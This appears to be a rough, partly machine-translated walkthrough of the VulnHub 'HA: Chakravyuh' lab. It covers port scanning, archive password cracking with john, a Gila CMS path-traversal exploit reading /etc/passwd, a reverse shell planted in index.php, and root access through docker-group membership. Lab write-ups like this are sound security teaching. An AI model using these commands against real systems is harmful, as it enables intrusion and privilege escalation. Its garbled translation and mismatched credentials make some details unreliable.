Drone link:
https://www.vulnhub.com/entry/ha-chakravyuh,388/
Host probe scanning:
Port scan:
╰─ nmap -p- -sC -sV 10.10.202.131
Anonymous FTP Access
Download the zip file, unzip password is required, the basic routine has been, a password is required, the next step is to find things to extract the password of the
Directory enumeration under
phpmyadmin unsuccessful attempt to blow up weak passwords password
phpmyadmin version 4.6.6 RCE no such loophole
So try blasting cabinet file to download 7z format
Here the use of tools:
https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py
python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
arjun.7z:family
Extract passwords as: family
Secret.txt content decoding obtained as follows:
Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=
base64 decoded as: gila: [email protected]: princesa
gila is a cms system, attempts to access a look
Login Web: http: //10.10.202.131/gila/admin
[email protected]: Princess
Here used exp https://www.exploit-db.com/exploits/47407
http://10.10.202.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd
浏览到系统目录文件,尝试编辑index.php 添加反shell代码进去,保存,访问即可弹回shell
python -c 'import pty;pty.spawn("/bin/bash")'
提权操作:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
cat /etc/crontab
ls -lh /etc/passwd
netstat -tunlp
没找到可提权的程序,最后发现当前账户的属组是docker组的,大家都知道docker运行基本都是root权限的身份去执行的
docker run -v /root:/mnt -it alpine
此命令的意思是:docker运行一个交互式的Linux系统alpine,挂载系统的/root 目录到/mnt目录下,这样就可以获取到root目录下的文件内容了。或者直接写root的crontab 等
OVER!!